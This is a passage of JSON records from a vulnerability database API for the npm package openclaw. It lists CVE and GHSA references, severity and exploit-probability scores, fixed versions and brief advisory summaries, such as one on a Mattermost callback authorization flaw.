"scoring_elements": "0.18553", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41383" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/b21c9840c2e38f4bb338d031511b479d5f07ca25" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m34q-h93w-vg5x" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41383", "reference_id": "CVE-2026-41383", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41383" }, { "reference_url": "https://github.com/advisories/GHSA-m34q-h93w-vg5x", "reference_id": "GHSA-m34q-h93w-vg5x", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m34q-h93w-vg5x" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths", "reference_id": "openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" }, { "value": "6.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:49:59Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-remote-directory-deletion-via-mis-scoped-mirror-mode-paths" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41383", "GHSA-m34q-h93w-vg5x" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r5bw-c2py-9udf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91808?format=api", "vulnerability_id": "VCID-r9j7-ya3h-cbda", "summary": "OpenClaw: Mattermost callback dispatch allowed non-allowlisted sender actions\n## Summary\nMattermost interactive callback dispatch could run action handlers before normal sender authorization checks completed.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/mattermost/src/mattermost/interactions.ts now requires callback authorization before dispatching actions.\n- extensions/mattermost/src/mattermost/monitor.ts routes callback authorization through the same sender and allowlist policy used for normal ingress.\n\nOpenClaw thanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35652", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19797", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19749", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19792", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35652" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35652", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35652" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch" }, { "reference_url": "https://github.com/advisories/GHSA-8883-9w57-vwv6", "reference_id": "GHSA-8883-9w57-vwv6", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8883-9w57-vwv6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35652", "GHSA-8883-9w57-vwv6" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r9j7-ya3h-cbda" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90036?format=api", "vulnerability_id": "VCID-r9y1-z2ax-z3e2", "summary": "Duplicate Advisory: OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-mf5g-6r6f-ghhm. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 contains a pre-authentication rate-limit bypass vulnerability in webhook token validation that allows attackers to brute-force weak webhook secrets. The vulnerability exists because invalid webhook tokens are rejected without throttling repeated authentication attempts, enabling attackers to guess weak tokens through rapid successive requests.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": 